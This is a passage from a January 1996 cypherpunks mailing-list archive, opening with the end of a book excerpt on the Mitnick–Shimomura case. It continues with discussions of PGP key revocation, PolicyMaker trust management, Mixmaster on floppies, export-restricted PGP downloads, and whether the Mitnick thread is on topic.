   that Kevin Mitnick, whatever his threat to cyberspace and
   society, was not that hard to find.

   I tried to get the government to answer Young's question
   about Shimomura's presence. I asked the San Francisco U.S.
   Attorney's Office and they suggested I ask the FBI. But the
   FBI had no comment. I asked Schindler, the Assistant U.S.
   Attorney in L.A., and he didn't have an answer. I asked
   Scott Charney, the head of the Justice Department's
   Computer Crime group, and he said he couldn't comment. I
   asked the Assistant U.S. Attorney who would logically had
   to have approved sending Shimomura three thousand miles to
   Raleigh, North Carolina. But Kent Walker oddly suggested I
   ask Shimomura for the answer.

   The response reminded me of what John Bowler, the Raleigh
   prosecutor, had said when I asked him how John Markoff came
   to be in Raleigh. He, too, had suggested I ask Shimomura.
   Shimomura seemed to be operating independently. outside of
   the Justice Department's control. Or was he running their
   show?

   The media appeared captivated by Shimomura's spell. Except
   for the Washington Post and The Nation, most major
   publications and the television networks accepted John
   Markoff's and Tsutomu Shimomura's story at face value.
   Kevin Mitnick's capture made for great entertainment.

   Not one reporter exposed the extraordinary relationship
   between Shimomura and the FBI. Most seemed to ignore the
   conflict of interest raised by the financial rewards
   Shimomura and Markoff received by cooperating with the FBI.
   A Rolling Stone magazine story condoned Markoff's actions,
   saying he had merely done what any journalist would do when
   presented with the possibility of a big scoop. The media
   critic for Wired suggested only that Markoff should have
   advised New York Times readers earlier of his personal
   involvement in capturing Mitnick.

   The media functioned as a publicity machine for Shimomura
   and the federal government, quickly churning out a round of
   articles arguing for tougher laws and greater security on
   the Internet. But the fury over what Assistant U.S.
   Attorney Kent Walker described as Mitnick's "billion
   dollar" crimes simply distracted the public from the real
   issues. Privacy intrusions and crime in cyberspace were old
   news, and a series of Internet break-ins after Mitnick's
   arrest proved the capture of cyberspace's most wanted
   criminal had changed little.

   The real story was that Internet providers, the new
   equivalent of phone companies on the information
   superhighway, appeared naive about how to investigate
   break-ins while protecting the privacy of their
   subscribers. After an FBI computer child-pornography
   investigation was made public in September of 1995, the
   Bureau revealed that it had read thousands of e-mail
   correspondences, and invaded the privacy of potentially
   dozens of citizens in the course of its investigation.
   Privacy activists complained that constitutional rights
   were being bulldozed, but the FBI announced the public
   should expect more of the same. "From our standpoint, this
   investigation embodies a vision of the type of
   investigatory activity we may be drawn to in the future,"
   said Timothy McNally, the special agent in charge.

   The government seemed to be promoting a hacker dragnet to
   make sure the Internet was crime free for the millions of
   dollars of commerce on its way. Kent Walker, the Assistant
   U.S. Attorney who left the Justice Department within weeks
   of Mitnick's arrest for a job with a Pacific Telesis spin-
   off, was one of the many government officials who claimed
   the FBI couldn't crack high-tech cases without people like
   Shimomura.

   Perhaps prosecutions would increase if the FBI bolstered
   its force with nonprofessionals. But where would that leave
   the law and the Constitution?

   (pp. 368-73)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 7 Jan 1996 03:22:03 +0800
Subject: Re: Mixmaster On A $20 Floppy?
In-Reply-To: <4cmg14$682@calum.csclub.uwaterloo.ca>
Message-ID: <Pine.LNX.3.91.960106121016.1382C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> >Question 1: Can you fit linux, pgp, mixmaster, etc. on the 135 Mb disk and
> >have enough useful space left over for a useful amount of data? 
>
> [snip snip snip]
> 
> But if I can squeeze everything I need to turn an arbitrary PC
> into a secure (modulo hardware) login session into 1.44 MB + boot image,
> I don't think there's a problem putting all the stuff you want on a
> 135MB disk.  Hell, the _hard disk_ on my Linux box is only 80MB...

Someone can get one of those tiny devices that slips on the end of a 
keyboard connector and captures all the scan codes - you're better off 
bringing the whole computer (laptop) along with your floppy. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 7 Jan 1996 04:49:27 +0800
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: USENIX anyone?
Message-ID: <ad148d0f04021004ce8a@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 AM 1/4/96, Matt Blaze wrote:
>I'm going to be at the USENIX conference in San Diego later this month,
>as are, I suspect, many other crypto/cypherpunk types.
>
>Any interest in a crypto BOF?


I have organized a Remailers and other "Cypherpunkish" topics BOF. I think
it is scheduled for Thursday at 6:30 - 8:30

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: post@why.net (post)
Date: Sun, 7 Jan 1996 03:52:15 +0800
To: cypherpunks@toad.com
Subject: Why can't I get PGP from MIT
Message-ID: <19960106184748728.AAA262@tar176.why.net>
MIME-Version: 1.0
Content-Type: text/plain


MIT won't let me get PGP or PGPhone.  I know their server
went down awhile back but, I have tried them several times
and sent several e-mail requests.  I thought maybe I was
missing something obvious or maybe they are just really
busy.  I keep being told I'm not in the U.S.

I have tried two different Internet service providers and
my Unix account at Lockheed Martin Tactical Aircraft Systems.
I understand why I would be denied when trying to get PGP from 
a commercial site but, under my personal accounts I get the
same results.  I requested that my providers be put on the
"approved" list of domestic sites but still get the same results.
My original e-mail request to MIT was sent roughly 3 months ago.

All I want is clean copy of PGP for personal use.  I have considered
purchasing a commercial system but still would like to try PGP with
the big keys.

                            Thanks,
                            Sid Post
                            post@why.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 7 Jan 1996 02:32:21 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <ad13f5e103021004cdef@[205.199.118.202]>
Message-ID: <199601061803.NAA17075@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> If one can safely and securely store a revocation certificate for later
> use, why not just store the much shorter passphrase?

Well, you're dealing with very different threats in the two cases AFAICS. 
With your passphrase and private key, someone can forge your signature, read
your encrypted incoming mail, etc. With your revocation certificate and 
private key, about all they can do is revoke your key and force you to
create a new one. I certainly find the latter prospect much less alarming --
by far the lesser of two evils. Heck, it's good to update keys periodically,
so they might even be doing me a favor of sorts ;)

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO65WSnaAKQPVHDZAQEIngf+OnXNLpkc4MlE+F0O24lCgso29k0cYRiW
jOHKJJfl9ryfaM/WT8eyRLIbWhO7A2qMGSF9nlRUCuhLBgQuX6tmboTwDPW3RPzq
jKbZ6LO615w0xPhZpDQO/B963sF0UOcIc0v49k1Ua6biUeEQ/0luYn7nQPD9RVDV
pb0qkk201qgVDkXXxPR+hN/HXstI0mc2+HjQjAhHiIOLyiMN3aPwGDH1XmHP5UiE
TVw+M9cAqyC863KMg+WEkIGXvdwLJ2or6QQ07i50Zwl905mSFd9+nHVx5HLbkKFa
UZvwU46zZXx069MIKHLFY2hX1ZqgR5eGGHUa6bZbMkeIjSl50IzILA==
=ssJd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Jan 1996 04:09:28 +0800
To: cypherpunks@toad.com
Subject: Re: Why can't I get PGP from MIT
Message-ID: <ad14132506021004ae87@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:47 PM 1/6/96, post wrote:
>MIT won't let me get PGP or PGPhone.  I know their server
>went down awhile back but, I have tried them several times
>and sent several e-mail requests.  I thought maybe I was
>missing something obvious or maybe they are just really
>busy.  I keep being told I'm not in the U.S.

As I recall, they don't tell you you're "not in the U.S.," they tell you
they cannot conclude in the affirmative that you _are_ in the U.S.

This has to do with whether they have a record (DNS) of your site, blah
blah. And the message about sending them e-mail affirming your status,
etc., points out that the mail is handled manually and may not be gotten to
for a while.

This happened to me, with PGPhone, when they could not confirm my ISP
(got.net) to be a U.S.-based service. I simply grabbed one of the
"otherwise available" copies (it was either posted publically, or available
at an offshore site, I forget which). This was several months ago, the day
after it was released. I fired it up, concluded I was missing some pieces
needed to make it work, and put it aside for the time being.

For PGP, I always go to the offshore sites anyway, on principle.

These sites are listing with numbing frequency in all the usual places.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 7 Jan 1996 02:34:23 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <199601061748.LAA06159@proust.suba.com>
Message-ID: <199601061822.NAA06999@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> > Note that the problem here is in the basic trust model, not just the
> > certificate distribution model (which is a separate problem).  The lack of
> > ability for a certifier to revoke his own certification, plus the lack of a
> > facility to put limits on the duration and meaning of the certification,
> > make PGP certificates of very limited practical value.
> 
> Isn't the last bit here, the part about duration and meaning, the 
> practical answer to the problem?  Especially duration?
> 
> The stuff that's been going on lately with Netscape's browsers, Sameer's
> apache ssl server, and the difficulty of getting CAs like verisign to
> approve keys underscores the importance of this issue.
> 
> This is probably sort of half-baked, but is it possible to come up with a 
> formal grammar that would allow us to describe trust models in general?  
> What if we had a prolog-like system that allowed you to set up rules like:
> 
> "x is a student if x has got a signature from a school" 
> "x is a school if x has got a signature from the accredation authority"
> "x belongs to the secret society of x has signatures from 3 other people
> who have belonged to the society for more than a year, and if x is 
> a certified owner of a duck."
> 
> Wouldn't something like this give us the flexibility to use a PGPish model
> of trust or an X.509ish model, or whatever else we wanted to do?
> 
> It seems to me that the rules that govern when you can accept which 
> signature ought to be data objects in a more flexible system, just as the 
> signatures themselves are data objects.  That means that the rules 
> themselves ought to be subject to change, revokation, or revision.  
> 
> The constitution wouldn't have survived if it didn't contain a mechanism 
> for ammendment.  Wouldn't a model of trust with the same ability for 
> revision and extension be a lot more robust, and a lot more resistent to 
> centralized control?
> 

Indeed, I agree that's the right approach.  In fact, I agree so much
that I've spent the last few months (with Joan Feigenbaum and Jack
Lacy) developing the principles and structure for just such a "trust
management" system.  Watch this space for details of our system, called
"PolicyMaker", which I expect to release a paper about shortly and a
reference implementation around April or May.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sun, 7 Jan 1996 03:02:06 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster On A $20 Floppy?
In-Reply-To: <199601060155.UAA13574@pipe3.nyc.pipeline.com>
Message-ID: <4cmg14$682@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601060155.UAA13574@pipe3.nyc.pipeline.com>,
tallpaul <tallpaul@pipeline.com> wrote:
>Question 1: Can you fit linux, pgp, mixmaster, etc. on the 135 Mb disk and
>have enough useful space left over for a useful amount of data? 

Yes.  I have a pair of standard 1.44 MB floppies, one of which has
a Linux kernel (boot disk), the other has a filesystem containing
just enough stuff to be able to stick the disk in an arbitrary
PC, use PPP to connect to the net, and use kerberos to log in.
I'm going to use the new ramdisk features in the 1.3 kernels to
put more useful stuff on the disk, too, like file utils, maybe... :-)

But if I can squeeze everything I need to turn an arbitrary PC
into a secure (modulo hardware) login session into 1.44 MB + boot image,
I don't think there's a problem putting all the stuff you want on a
135MB disk.  Hell, the _hard disk_ on my Linux box is only 80MB...

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sun, 7 Jan 1996 04:11:41 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601062000.OAA20579@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 1/6/96 -0800, tcmay@got.net wrote:

>If one can safely and securely store a revocation certificate for later
>use, why not just store the much shorter passphrase?

If the security of the safely-stored passphrase is violated, a lot of
trouble can be caused.  There's not nearly as much that can be done with
a stored revocation certificate.

dave

---
Sorry for any delayed replies, but business trips are so seldom announced.
David E. Smith, dsmith@midwest.net, PGP ID 0x92732139







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 7 Jan 1996 04:38:38 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Why can't I get PGP from MIT
In-Reply-To: <2.2.32.19960106200842.0095e840@mail.teleport.com>
Message-ID: <Pine.LNX.3.91.960106151957.5334B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jan 1996, Alan Olsen wrote:

> At 12:47 PM 1/6/96 -0600, post wrote:
> >MIT won't let me get PGP or PGPhone.  I know their server
> >went down awhile back but, I have tried them several times
> >and sent several e-mail requests.  I thought maybe I was
> >missing something obvious or maybe they are just really
> >busy.  I keep being told I'm not in the U.S.
> 
> There was a posting (either on the server or somewhere else) that claimed
> that the MIT site was having problems with .net and .org sites.  (As well as
> a couple of others if I remember correctly.)  The posting claimed that they
> had fixed the problem, but i guess not...

I believe I had a problem when I wanted to get PGP coming from 
internexus.net (New Jersey). I just e-mailed them about it and I think 
they just added the site to their 'acceptable' list. I did a traceroute 
to why.net and noticed that it is very close to me, coming off of 
SprintNet... probably the same situation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 7 Jan 1996 08:00:07 +0800
To: cypherpunks@toad.com
Subject: RE: Revoking Old Lost Keys
Message-ID: <199601062342.PAA04578@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps if keys could be made with expiration dates (certificates too),
this problem might be reduced to managable proportions.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lou Zirko" <Lou.Zirko@rex.isdn.net>
Date: Sun, 7 Jan 1996 06:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: Why can't I get PGP from MIT
Message-ID: <m0tYgVA-000927C@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


I have sent two requests myselt in the last two months that have gone 
unanswered.  The request was to have isdn.net added to the allowed 
list.  I know the initial rejection was the .net domain, but the 
location should not be hard to look up - just a basic whois.  

I got PGP from alternative locations, but still have not been able to 
get PGPhone.

> MIT won't let me get PGP or PGPhone.  I know their server
> went down awhile back but, I have tried them several times
> and sent several e-mail requests.  I thought maybe I was
> missing something obvious or maybe they are just really
> busy.  I keep being told I'm not in the U.S.
<snip>
> All I want is clean copy of PGP for personal use.  I have considered
> purchasing a commercial system but still would like to try PGP with
> the big keys.
> 
>                             Thanks,
>                             Sid Post
>                             post@why.net
> 
> 
> 
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBLJocAAAEEAMlDzYJPYq0pvfMuSiKU0Y65L2nJql+qEJHYGjO5Pys4prDw
YW1ooPWaqrPQAy/eyqrM7I9KNFDCtmaPxtgcPw2oEDfc/w6cPkrVzvovKLfHQvtg
V/hHUekptSf6j525omrVAoM9MxVL3sEGCjn9VrTeC3h9upkfntHOJeL88i2NAAUR
tB5Mb3UgWmlya28gPHppcmtvbEBkYXRhdGVrLmNvbT4=
=Qlxm
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 7 Jan 1996 08:05:45 +0800
To: cypherpunks-announce@toad.com
Subject: Jan 13 Mountain View CA meeting
Message-ID: <199601062350.PAA18983@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all, happy new year. 

The Jan 13 Mountain View, California meeting will be held again
at Sun Microsystems, at Sparcy's cafeteria.   That's building 21, 
in the set of Sun buildings near Shoreline Park in Mountain View. 
Take 101 to Amphitheater Parkway exit, turn left onto Charleston 
at the light (this street is also named Garcia at its far end)
and follow the purple Sun signs for building 21.   You'll drive
down Charleston (Garcia) for about 1/3 mile and then turn right
onto a road that in about 3 blocks takes you to B21. 

Please send mail if you have a topic you would like to speak about,
and I'll send out a speaking agenda towards the end of the week. 

Marianne
mrm@netcom.com
mrm@eng.sun.com 

p.s. I'll bring bagels again but since I never got reimbursed 
last time around I think I will put out the donation jar this
time ...! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 7 Jan 1996 05:15:51 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster On A $20 Floppy?
Message-ID: <199601062050.PAA04925@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 06, 1996 12:16:57, 'Laszlo Vecsey <master@internexus.net>' wrote: 
 
 
>> >Question 1: Can you fit linux, pgp, mixmaster, etc. on the 135 Mb disk
and 
>> >have enough useful space left over for a useful amount of data?  
>> 
>> [snip snip snip] 
>>  
>> But if I can squeeze everything I need to turn an arbitrary PC 
>> into a secure (modulo hardware) login session into 1.44 MB + boot image,

>> I don't think there's a problem putting all the stuff you want on a 
>> 135MB disk.  Hell, the _hard disk_ on my Linux box is only 80MB... 
> 
>Someone can get one of those tiny devices that slips on the end of a  
>keyboard connector and captures all the scan codes - you're better off  
>bringing the whole computer (laptop) along with your floppy.  
> 
 
First, I am not convinced that such devices exist in the real, practical
world. They would require either storage hardware or radio transmitters,
all in a package small enough to be undetectable to the naked eye. 
 
Second, I do not think it practicable that the cosmic-nasties (of one's
chosen social bias) could, in the real, practical world, run black-bag jobs
on tens of thousands of surburban garages as a prophylactic measure against
teenagers "playfully" setting up Mixmaster sites. 
 
The software costs of quality crypto approach nil thanks to the terrific
folks who brough us things like linux and pgp. It is, I think, easy for us
to miss the giantic steps forward that these technologies represent.
Imagine talking to an IBM-mainframe priest of not-too-many years ago about
the idea of something like linux; imagine the same thing with an NSA
bureaucrat about the development cost of a security concept/package like
pgp! 
 
Move hardware costs downward and user-interface upward, and Mixmaster isn't
a "black art" of cypherpunks. It is a parlor game for teenage slumber
parties. That's the type of world I want to see. 
-- 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 7 Jan 1996 13:40:09 +0800
To: cypherpunks@toad.com
Subject: RE: Revoking Old Lost Keys
Message-ID: <v02120d0aad14cd5b84bb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:45 1/6/96, Bill Frantz wrote:
>Perhaps if keys could be made with expiration dates (certificates too),
>this problem might be reduced to managable proportions.

I would very much like to see expiration dates on public keys. Is PGP 3.0
offering this feature?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 7 Jan 1996 06:42:51 +0800
To: cypherpunks@toad.com
Subject: "trust management" vs. "certified identity"
Message-ID: <199601062232.RAA12812@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


The discussions here of the limits of PGP's certification and
revocation model are close to the core of some work I've been doing
(with Joan Feigenbaum and Jack Lacy) on what we call the "trust
management" problem.

Essentially we consider the consequences of abandoning the notion
of "certified identity" implicit in systems like X.509 and PGP and
subsuming identity under the more general umbrella of specifying
and determining what a key is trusted to do.

We've built a system, called "PolicyMaker", that allows the certifier
of a key to specify what the key is trusted to do rather than to
whom the key is trusted to belong.  The same mechanism is also used
to specify and interpret local policies.  The PolicyMaker system
is designed to be called as a service by local applications,
which could be email systems like PGP or network-layer security
protocols or any other application that requires complex trust
relationships.

Some early, local experience suggests that this approach is a good
one.  It's easy to specify X.509- and PGP-style policies and
certificates, but you can also say things like "valid for transactions
over $500 only if countersigned" in a fairly natural way.

I'll be happy to send a (very early) draft of our paper, "Decentralized
trust management" to anyone who's interested.  I've made the draft
available in the CFS-users email archive server.  To request a copy
(PostScript format) by email:
   echo get cfs-users pmdraft.ps | mail cfs-users-request@research.att.com
(For non-unix shell people, just send a message to
	cfs-users-request@research.att.com
With the line:
	get cfs-users pmdraft.ps
in the BODY of the message (NOT on the subject line).)

Comments and discussion appreciated.

This is an early draft, and I'd appreciate it if it not be directly
quoted, cited, or re-distributed.

-matt

PS  We expect to give away our reference implementation, too.  (Probably
by May or so.)  Note that this is just research, and does not represent
any current, past, or future product or service offering on the part
of AT&T or anyone else.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: belize@ix.netcom.com (GENERAL STEVEN WALZ)
Date: Sun, 7 Jan 1996 09:57:03 +0800
To: cypherpunks@toad.com
Subject: ssn
Message-ID: <199601070144.RAA23014@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Send info on ssn# 

belize@ix.netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 7 Jan 1996 07:42:19 +0800
To: cypherpunks@toad.com
Subject: please stop the Mitnick stuff
Message-ID: <199601062331.SAA05063@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This is cypherpunks, not Mitnick punks, Shimomura punks, or anything
similar. I personally don't care about Kevin Mitnick, and he most
certainly has little to no cryptography relevance at this point. Take
it elsewhere.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Vincenzetti <vince@dsi.unimi.it>
Date: Sun, 7 Jan 1996 02:17:43 +0800
To: hfinney@shell.portal.com
Subject: (cpx) Re: mental cryptography (fwd)
Message-ID: <199601061748.AA216460533@idea.sec.dsi.unimi.it>
MIME-Version: 1.0
Content-Type: text


> I have read one paper which attempts to solve this problem, called "Human
> Identification through Insecure Channel".  Unfortunately my papers are in
> a mess right now so I don't have the reference handy.  It was by some
> Japnese researchers, published in one of the proceedings books.  I
> believe a follow-on paper was published within the last year or two which
> had some improvements or corrections to their algorithm.  Sorry to be so
> vague, I'll try to dig out more info over the weekend.
> 
> Basically they used a challenge-response system which was intended to
> be simple enough that people could do it in their heads.  The card
> would display a random challenge string, some characters of which were
> special to the user and others which he would ignore.  He would then
> input a response string, where it didn't matter what corresponded to
> the "ignore" slots, but in the special slots he had to produce certain
> symbols corresponding to the other symbols, with the rules changing as
> you move along.  The intention was that even by capturing and analyzing a
> great many challenge-response pairs you couldn't create a response to a
> challenge you hadn't seen before.
> 
> I coded this up, and frankly, I couldn't do the required manipulations in
> my head, at least not without taking a very, very long time, and thinking
> very carefully.  Maybe it would get easier with practice, I don't know.
> But my overall feeling was that this would be at the limits of human
> capability even for fairly bright people.  (OTOH I suppose learning to
> read and write might seem pretty tough if you'd never done it.  Maybe
> the 1st grade classes of the future will spend months training the kids
> on how to use these kinds of algorithms.)

The paper can be found in the proceedings of Eurocrypt '91,
D.W. Davies (Ed.), Springer-Verlag.   The author is Hideki IMAI,
<tsutomu@mlab.dnj.ynu.ac.jp>.

I found the above paper very interesting, and I am actually going
to code it up.  Eventually, I would be highly interested in giving
a glance at your code.  Is your code available?

Ciao,
David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sun, 7 Jan 1996 08:13:43 +0800
To: cypherpunks@toad.com
Subject: Re: Internet & Porno on A&E tonite
Message-ID: <9601070002.AA26160@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:05 PM 1/6/96 GMT, Mutatis Mutantdis wrote:
>
>>Just saw an add for a Investigative Reports show tonite on A&E dealing with
>>the Internet and some of the current issues relating to porno and privacy.
>
>What time?!?

  9:00 P.M. E.S.T.


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Sun, 7 Jan 1996 13:49:50 +0800
To: cypherpunks@toad.com
Subject: carrick demo revisited
Message-ID: <199601070327.TAA04424@igc4.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



Please note that the carrick demo that is available on www.encryption.com 
is just that; a DEMO.

As the documentation states, the file format is NOT what is in the full 
retail product.  The files that the demo generates are NOT compatible with 
the full retail version.

The demo is a marketing-driven effort.  The shipping version will have a 
different UI, a different file structure, a different file header, etc.

Azalea Software will make full source code available to those who wish to 
review carrick under nondisclosure agreement.  We have written an FAQ that 
details carrick's API's and file header.  It will answer many questions that 
some cryptographically sophisticated users may have.

We apologize for any misunderstanding or inconvenience the demo may have 
caused.  Again, the demo is a marketing piece to accompany the press release 
that we are distributing.  Ver 1.0 should be going out the door any day now 
and we invite all cypherpunks and other encryption fans to look it over.

Azalea Software, Inc.   1 800 ENCRYPT   www.encryption.com   carrick@azalea.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 7 Jan 1996 09:00:02 +0800
To: cypherpunks@toad.com
Subject: Re: please stop the Mitnick stuff
In-Reply-To: <199601070023.BAA04907@utopia.hacktic.nl>
Message-ID: <199601070042.TAA05199@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> 
> At 06:31 PM 1/6/96 -0500, Perry Metzger wrote:
> >
> >This is cypherpunks, not Mitnick punks, Shimomura punks, or anything
> >similar. I personally don't care about Kevin Mitnick, and he most
> >certainly has little to no cryptography relevance at this point. Take
> >it elsewhere.
> 
> C'mon, Perry, give it a break.  Mitnick's case has to do with security
> issues as well as the violations of privacy and/or search and seizure
> the government used to arrest him.

This isn't Libernet-d or something similar. This isn't where we
discuss violations of search and seizure laws or thing of that
kind. The world is full of injustice -- but this isn't the place to
discuss it. Mitnick's case has very little (certainly at this point)
to do with security, and never had anything to do with cryptography.

> I found it interesting.  If you didn't, then all you had to do was
> delete it.

When there are one or two small items posted on a topic thats no big
deal. When its a lot of stuff, it becomes an enormous pain. Multiply
the few seconds to read and digest enough of a message to know you
should delete it by dozens of messages per mailing list per day and by
a dozen mailing lists and you suddenly have an untenable waste of your
time.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 7 Jan 1996 12:06:18 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: please stop the Mitnick stuff
Message-ID: <v02120d0bad14ee9ba9ef@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:16 1/6/96, John Young wrote:

>   Also, crypto-related: The fact that Shimomura's supposedly
>   secret files were not protected by encryption or other
>   security is what causes Littman and others to think there
>   was a sting (perhaps with TLA help) rather than foolish
>   vanity of the security wizard.

[I do belive this has CP relevance.]

Of course it was a set-up. Mitnick got into Shimomura's computer by
impersonating the IP address of one of Shimomura's machines. The router
should have never let packets in from outside that have an IP address that
is supposed to be inside. That a 'security expert' would overlook such a
blatant and well publicized hole in his _own_ router is inconceivable.

Shimomura was trying to get someone to break into his system. If the bait
was specifically for Mitnick, we may never know.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: srw134@psu.edu (Sean Wilkins)
Date: Sun, 7 Jan 1996 09:22:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601070102.UAA91196@r04n12.cac.psu.edu>
MIME-Version: 1.0
Content-Type: text/plain


unsubscibe
Sean Robert Wilkins
Student , Staff , And The MAN
(SRW134@PSU.EDU)
---LTR---








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 7 Jan 1996 09:13:47 +0800
To: "Frank O'Dwyer" <fod@brd.ie>
Subject: Re: "trust management" vs. "certified identity"
In-Reply-To: <01BADC99.C7034FE0@dialup-169.dublin.iol.ie>
Message-ID: <199601070103.UAA13065@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


...
>That's not to say that the certification approach can't be general, though.  
>It occurred to me that a very general certificate format would
>simply be to sign some assertions (predicates), and then 
>feed all available signed predicates plus some axioms (the analogue 
>of root keys) into a theorem prover.  Sounds slow though.  More 
>practically perhaps, you could sign some kind of (safe) interpreted code, 
>and have the verifier execute it on some initial variable set to come up with
>some access decision.  
>
Yes.  That's pretty much PolicyMaker in a nutshell.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 7 Jan 1996 09:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Rules Report
Message-ID: <199601070103.UAA25559@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


